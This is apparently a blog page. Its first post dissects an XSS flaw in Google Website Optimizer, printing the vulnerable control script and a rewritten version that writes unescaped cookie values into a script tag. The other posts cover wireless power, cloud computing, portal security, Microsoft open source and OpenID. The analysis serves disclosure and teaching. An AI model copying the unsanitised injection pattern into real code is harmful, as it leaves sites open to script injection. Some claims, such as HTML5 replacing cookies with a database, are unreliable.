SolutionOnline's Blog an idea at work


Google XSS Flaw in Website Optimizer Scripts

This week thousands of system administrators who make use of Goolge products will open their inbox to see an email from Google explaining that their Web Optimizer product contains an Cross-site scripting flaw that allows hackers to inject scripts into their Google Optimized web pages.

A part of this email follows:

“you are using a control script that could allow an attacker to execute malicious code on your site. To fix the vulnerable section of code, you should immediately either replace the control scripts in your affected experiments or stop the affected experiments and start new experiments”

On receiving this notification I quickly scrambled to my web sites to immediately implement the fix recommended by Google. Later on in the day I had time to to dig deeper into the problem and analyse the security flaw in more detail. What I found is a multi-staged attack that relies on cookie injection, improper text parsing and DOM script injection code.

I have documented my research in this article, and I hope that it will be of use to you. There is a lot to learn from other people’s mistakes, especially when those people are Google themselves.

The flaw exists in Googles Web Optimizer, which is a series of scripts that web administrators use to gain insight into how their web sites are navigated by online customers.

Below is a segment of the the flawed code.

<!-- Google Website Optimizer Control Script -->
function utmx_section(){}function utmx(){}
(function(){var k='XXXXXXXXXX',d=document,l=d.location,c=d.cookie;function f(n){
if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n.
length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash;
d.write('<sc'+'ript src="'+
+new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+
'" type="text/javascript" charset="utf-8"></sc'+'ript>')})();
<!-- End of Google Website Optimizer Control Script -->

This Website Optimizer Control Script is embedded within your web page to track it. It will be run on the user’s end, and under a successful attack it will extract a malicious script from their cookie and execute it in their browser.

The code above is standard JavaScript however it is not easy to read. There are two reasons for this; firstly, like most Google client side scripts, it is obfuscated, purposely making it cryptic. Secondly it was designed to work fast and efficiently, and not to be easily understood.

I manually de-obfuscated this code, and whilst doing that, I re-factored it to make it easy to understand. The code below should be easy enough to read by anyone with JavaScript knowledge, yet it fulfills the same function as the cryptic code provided by Google.

01.  function AB_Analysis(){
03.     var d=document;
04.     var l=d.location;
05.     var h=l.hash;
06.     var injectionvector1 = ReadFromCookie('__utmx');
07.     var injectionvector2 = ReadFromCookie('__utmxx');
08.     d.write
09.     ('<script src='+k
10.     +'&utmx=' + injectionvector1
11.     +'&utmxx='+ injectionvector2
12.     +'&utmxtime=' + new Date().valueOf()
13.     +(h?'&utmxhash='+escape(h.substr(1)):'')
14.     + '" type="text/javascript" charset="utf-8"></script>')
15.  }
17.   function ReadFromCookie(field_name){
18.     var c = document.cookie;
19.     var start = c.indexOf(field_name+'=');
20.     var end = c.indexOf(';',start);
21.     return c.substring(start + field_name.length + 1, end);
22.   }
The security flaw starts in lines 06 and 07:
06.     var injectionvector1 = ReadFromCookie('__utmx');
07.     var injectionvector2 = ReadFromCookie('__utmxx');

Both these lines call into the function ReadFromCookie which parses the headers of a cookie file without sanitising the input. The lack of sanitation is on line 21:

21. return c.substring(start + field_name.length + 1, end);

Over here we can see a classic mistake – data is blindly read from an untrusted source. The substring function reads from the start of the field’s data all the way till the fist semicolon. What it reads should be a tracking number, but in this case it is a specifically planted ‘dormant’ script. It is dormant because it resides inside a cookie and not inside the HTML of the web page itself. The lines 10 and 11 are where the real trouble begins to show. The extracted and potentially dangerous script is injected into the user’s DOM:

08.     d.write
09.     ('<script src='+k
10.     +'&utmx=' + injectionvector1
11.     +'&utmxx='+ injectionvector2
12.     +'&utmxtime=' + new Date().valueOf()
13.     +(h?'&utmxhash='+escape(h.substr(1)):'')
14.     + '" type="text/javascript" charset="utf-8"></script>')

The code above is the one responsible for the fatal injection. There is some irony here. In the same statement of  code there exists some protection against XSS, but it does not go far enough.

Look at line 13:

13. +(h?'&utmxhash='+escape(h.substr(1)):'')

This code correctly treats the DOM hash (variable h) as untrusted because it can be manipulated in a similar way as the cookie can. The lines before it, however omit calling the escape() function that effectively sanitises code against XSS and similar attacks. Its a typical case of ‘so close, yet so far away’.

For those who find it hard to read JavaScript, I have included a flow chart showing the two functions, AB_Analysis and ReadFromCookie.

AB Analysis Function

The diagram above is a flowchart for the AB_Analysis script. This script is embedded on pages by web developers who are making use of the Google Web Site Optimiser. The red processes are where data is read from the cookie and added to a script, which is in turn injected into the DOM.

ReadFromCookie flowchart

Above is a flowchart for the ReadFromCookie function. There is no actual flaw here, except maybe that there is no limit to how much data is read out of the cookie. Also, the end of record detection is rather crude – simply looking for a semicolon in the data.

Below is how a normal cookie might look. Cookies are not very sophisticated and are generally described as simple text files on the user’s computer. In HTML5 cookies have been replaced by a full blown relational database.

Normal Cookie Example

umtx: some_value;
umtxx: some_other_value;

The compromised cookie below contains script inside the umtx and umtxx fields. This script is not active and therefore not dangerous. However, when the AB_Analysis script is executed, the umtx script gets activated through this XSS attack.

Compromised Cookie Example

umtx: <<malicious script goes here>>;
umtxx: <<malicious script goes here>>;

An attack is two staged; first the malicious script has to be injected into a cookie on the victim’s browser. After that, the user must visit a web page. containing the Google AB_Analysis script. The attack can be summarised in the diagram below.

Attack on Google Web Optimizer

Attack on Google Web Optimizer

Google was fast to react and provide a fix however this fix needs to be deployed by every web site administrator that uses Google Web Optimiser. This applies to hundreds of thousands of web pages globally.

I hope that administrators are quick to fix this problem as it could easily result in an XSS attack against their site if targeted.

Full instructions on different options on applying the fix can be found on the official Google support page.

Tagged as: , , No Comments


Power’s in The Air

Tired Of Being Wired

If phones, mice and keyboards could get wireless. Why not everything else? In fact, about a hundred years ago, that untamed genius, Nicola Tesla had already begun to build a tower at Wardenclyffe. demonstrate the transmission of electricity without the use of wires.

On a humbler scale. Researchers at MIT are in the process of repeating the experiment with their own ideas and less ostentatious techniques.


Marin Soljacic. Assistant Professor of Physics at the MIT. Has spent a considerable number of years trying to figure out how to transmit power without cables. Radio waves lose too much energy during their passage through the air and lasers are constrained by the necessity of line-of-sight. Soljacic. Decided to use Resonant Coupling, in which two objects vibrating at the same frequency can exchange energy without harming things around them. He used magnetic resonance and along with his colleagues Jon Hoannopoulos and peter Fisher, succeeded in lighting up a 60 watt bulb two mattes away. What they did was this: two resonant copper coils were tied to dangle from the ceiling, two meters away from each other. Both were tuned to the same frequency and one had a light bulb attached to it. When current was made to pass through one coil, it created a magnetic field and the other resonated, generating an electric current. And then there was light. The experiment succeeded in spite of a thin screen being placed between the two copper coils.

And if this comes through…

One of the most obvious results is that we won’t have dozens of cables to trip over in our offices and rooms. Primarily, the aim of this research team is to achieve a cable-free environment wherein your laptops PDAs and mobile phones could charge themselves (with all the electricity floating around) and even, maybe, get rid of the batteries that are so much an essential part of our portable devices today. Magnetic fields interact very weakly with biological organisms and this little face makes it infinitely safer for us. While this experiment happened about a year ago. The team is still hard at work trying to use other materials so as to increase the efficiency of the transfer of power from 50 per cent to 80 per cent. Once that happens, both, the industry as well as individuals will grab hold of it and never let go.

Filed under: Information No Comments

Cloud Computing

cloud computing

Cloud computing is an emerging computing technology that uses the internet and central remote servers to maintain data and applications. Cloud computing allows consumers and businesses to use applications without installation and access their personal files at any computer with internet access. This technology allows for much more efficient computing by centralizing storage, memory, processing and bandwidth.

It is one of the latest trends in the IT industry and has succeeded in making people think twice before building up their specialized IT departments. Normally a server has an operating system installed in it. The user has his own programs, documents, softwares installed in it. If he uses another server, he’s not going to get the data stored in the original one. In the concept of Cloud Computing, there exists a centralized Operating System. The user has to log in and use the system. The entire data that he wants to store or process is stored in a central server and to get a direct access to those data all that the user has to do is to login with his id and password.

Cloud computing is a style of computing in which dynamically scalable and often virtualized resources are provided as a service over the Internet. Users need not have knowledge of, expertise in, or control over the technology infrastructure in the “cloud” that supports them.

Cloud Computing: Need and Effectiveness

An entrepreneur has big ideas to streamline his business and pull his sales up so as to maximize his profits. And to do all these, his ideas need a number of business applications. But these business applications have huge complexities behind them. They need a data center with office space, power, cooling, bandwidth, networks, servers, and storage. And a team of experts to install, configure, and run them. They need development, testing, staging, production, and failover environments. This leads to a complicated software stack.Moreover a small upgradation can bring the whole system down! Now this is for one application. When we multiply these headaches across dozens or hundreds of apps, it’s easy to see why the biggest companies with the best IT departments aren’t getting the apps they need. Small businesses don’t stand a chance.

Cloud computing is a better way to run a business. Instead of running the applications oneself, they run on a shared data center. When one uses any application that runs in the cloud, he just logs in, customizes it, and starts using it.

Businesses are running all kinds of applications in the cloud these days. Cloud-based applications can be up and running in a few days, which is unheard of with traditional business software. They cost less, because one doesn’t need to pay for all the people, products, and facilities to run them. And, it turns out they’re more scalable, more secure, and more reliable than most apps. Plus, upgrades are taken care of for the user, so his applications get security and performance enhancements and new features—automatically.

The way one pays for cloud-based applications is also different. Forget about buying servers and software. When one’s applications run in the cloud, he doesn’t buy anything. It’s all rolled up into a predictable monthly subscription, so he only pays for what he actually uses. Finally, cloud applications don’t eat up the valuable IT resources. This lets one focus on deploying more apps, new projects, and innovation.

The advantages of Cloud Computing are summarized and listed below:

  • Fast to get started
  • Costs less
  • More scalable
  • More secure
  • More reliable
  • No server/ storage needed
  • No technical team needed
  • No upgradation needed
  • User friendly
  • Applicable to both consumer and business applications
  • Added option of custom-built apps.
  • Multi-tenancy
  • Flexible: one can customize by his specific needs
  • Applications get added features and enhanced performance automatically
  • Nothing to buy-predictable monthly subscription
  • Don’t eat up the valuable IT resources

Thus we can conclude that Cloud computing is a simple idea, but it can have a huge impact on your business.

With all these advantages, it’s difficult to think of reasons why we shouldn’t consider switching to a cloud computing IT environment. We have significantly fewer in house IT costs, we pay only for the computing resources we use, and cloud computing networks are often more secure than traditional business systems. And with the new collaboration abilities created by a cloud computing enabled workspace, we’ll be able to accomplish work more efficiently than ever before.


Securing your Portal

The direct participation of the customers in key business processes is enabled by enterprise and part of the business infrastructure of organizations in many industries- including financial services, healthcare, telecommunications and government. But major security issues are associated with this growing usage which include concerns about privacy, secure access management, fraud and the increased risk and cost of security breaches that are further magnified as the external user population grows. Portals normally contain important information and are deployed to user populations where authenticating user and controlling access to resources are critical. The strategic significance of these portals raises the need for organizations to apply security solutions that meet internal policies, address regulatory requirements and provide the right level of security to protect customer identities. Portals, when not properly secured, mostly invite unauthorized access to company networks by curiosity seekers or even worse, hackers and fraudsters.

Following are some tips that can be useful in securing the portals and protecting both the network and the customers:

Strengthening the portal:

This can be done by:

  • Ensuring that all user- whether employees, partners, suppliers or customers- have secured and convenient access, but only to the data and resources they need to perform their necessary tasks.
  • Centralizing the access policy administration- this will help in managing and enforcing the portal access, control policies centrally and cost-effectively based on end- user roles, risk level or dynamic attributes.
  • Having proper knowledge about the customers as secure portals begin at the initial customer enrolment phase.

Simplifying Customer security:

Customers always want a convenient network access. At the same time, they also demand for a high level of security protection for the network and their sensitive data to avoid the recent trend of online fraud and unauthorized access to enterprise networks and confidential information. Thus the organizations require a solution that delivers a strong portal authentication without hampering the customer’s experience or privacy. This may be done by:

  • Increasing customer usage by enabling access to multiple applications within the network with single sign-on (sso) – this will eliminate the frustration of tracking multiple passwords.
  • Risk-based authentication delivering both strong security and convenience to customers- this allows for a convenient user experience by minimizing the number of unnecessary challenges and lockouts.

Inspiring customer confidence:

The organizations that ensure the customers that their personal and business information is safe are always a step ahead of their competitors. As they provide secure online access, the number of transactions that customers conducting online will raise and a result their brand loyalty will also get enhanced. The entire method of the security measure and a complete and detailed clarification regarding the security solution should be provided to the customer so that the customer is clear about the safety of his portal. Moreover, by deploying a security solution that provides customers with site-to-user authentication, they are assured that they have gained access to a legitimate site, and not a fraudulent site designed to capture their credentials for the purpose of committing fraud at some future date. As a result a sense of security will boost customer confidence without compromising the user experience a significant increase in portal adoption and customer satisfaction.

Filed under: Information No Comments

Microsoft unveils new open-source initiative if you can’t beat them, join them!

Seems to be the new Microsoft strategy. After coming to the spotlight recently for donating around 20.000 lines of code to the open source community, ( to help windows run on Linux virtualization platforms ), they have now started a new open source foundation CodePlex, not to be confused with their open source code sharing web site of the same name. Their new foundation it seems is an effort to get more commercial companies to participate in open source ventures. As they state on their FAQ page: “We believe that commercial software companies and the developers that work for them under-participate in open source projects. “Sounds familiar. Isn’t that exactly what Microsoft did with its own open source submission? As taken from the blog of a Linux kernel developer about Microsoft’s Hyper-V kernel drivers code submission: “ Over 200 patches make up the massive cleanup effort needed to just get this code into a semi-sane kernel coding style ( someone owes me a bit bottle of rum for that work ! ) Unfortunately the Microsoft developers seem to have disappeared, and no one is answering my emails. If they do not show back up to claim this driver soon, it will be removed in the 2.6.33 release. So sad… “The open source community is one of instant feedback and continuous change, where projects continually get forked and die out. Microsoft just jumped into the deep end of the pool. Their new foundation is aimed to be an organization much like Mozilla, Gnome and KDE, however one which caters to a much broader spectrum of software projects. Another citation from their FAQ, which seems almost satirical, Poe’s law could have come in here: “Specifically we aim to work with particular projects that can serve as best practice exemplars of how commercial software companies and open source communities can effectively collaborate.” The cojones! While the foundation does include members of the open source community, it is questionable how much experience Microsoft could possibly have gained about collaborating with open source communities during its singular code dump which it failed to maintain.

Tagged as: , No Comments

Google acquires reCAPTCHA

reCAPTCHA, another one of the internet’s most innovative projects in now in Google’s grasp. Not only is reCAPTCHA an effective device for security against spam, it also manages to accomplish a mission, to convert a large volume of printed literature to text. While most such services automatically generate distorted letters, making them difficult for anyone but a human to discern, reCAPTCHA goes about it differently. With reCAPTCHA, every time you prove that you are a human you are effectively helping the process of digitizing printed documents. Instead of using better and better algorithms to generate better distortions which can only be recognized by humans, reCAPTCHA instead uses portions of scanned documents which failed to get recognized by the OCR    ( Optical Character Recognition ) algorithms used to digitize it. Many times these can easily be recognized by humans. With the support and resources of Google behind reCAPTCHA, it is possible for the project to reach an even higher gear. With all Google services using reCAPTCHA, and with more resources from Google to make reCAPTCHA more easily available and implement able, it is bound to see an increase in adoption. Projects such as Google Books and Google News search already use reCAPTCHA to help in digitizing a great volume of scans of old books, magazines and newspapers. Word by word, reCAPTCHA aims to digitize a large part of past documents which right now only exist in print, making more and more of our history index able, searchable, and accessible to a greater public.


Open ID Too Much To Take

When you sing info your Gmail account, you’re automatically signed into all Google Services- Docs, Blogger, Reader, whatever. And you like that, don’t you? We do too. It’s hassle-free, and hassle-free is good indeed. But then, you need another ID for your yahoo! Account. And another for your Windows Live services. And another for some other services we can’t really think of right now.

And then came Open ID- the initiative that promised us a single ID. If you remember just one single password. You’re set to access all the services you ever need. It’s more hassle-free than what we’re used to now, so it can only be better.

In January this year, there were only two players supporting the platform- Yahoo! And AOL. And we don’t know about you, but we remember sticking to our Yahoo! IDs to access the services. Now, however, more of the big guns have joined the movement for Open ID- Google, My Space and Microsoft, among others, announced their support for the platform in October.

Finally, it looks like the way is paved for a Web that’s much easier to access, and henceforth, we’ll only have just one ID to remember. Even better, you  already have an Open ID- none of this registration nonsense to contend with. Only one problem, though: people don’t seem to be using it. It’s not that people aren’t enthusiastic about it, either- you’re probably getting pretty excited about it, either-you’re probably getting pretty excited about Open ID yourself, we can tell-it’s just that they can’t figure it out. When Yahoo! Studied the success of their Open ID system, they saw one critical flaw with it- users found the system absolutely that befuddling.

But is it really that befuddling, or are we talking stupid users here? Turns out, logging into a service with an Open ID is considerably befuddling indeed. First, there’s the matter of your ID. You don’t register for one: if you have some sort of Web presence-Blogger or Yahoo!, for example- you already have an Open ID. In the former case, it’s your blog address., in the latter. It’s a little complicated. Then there’s the login process itself. It isn’t simple as username password any more. Let’s say we want to use your  Blogger address as your Open ID. You just enter your blog URL, In the box that asks for your Open ID, and click on Login. Then, you’ll be taken to Blogger, where you’ll have to log in using your Google ID. And then, you’ll go back to site you were trying to log into, and you’ll be signed in. Dizzy yet? And the process changes for every Open ID- toting service, too. And we know what you’re thinking- unless the companies get their act together and stop sending us bouncing around the Internet, we’ll keep our passwords, thank you.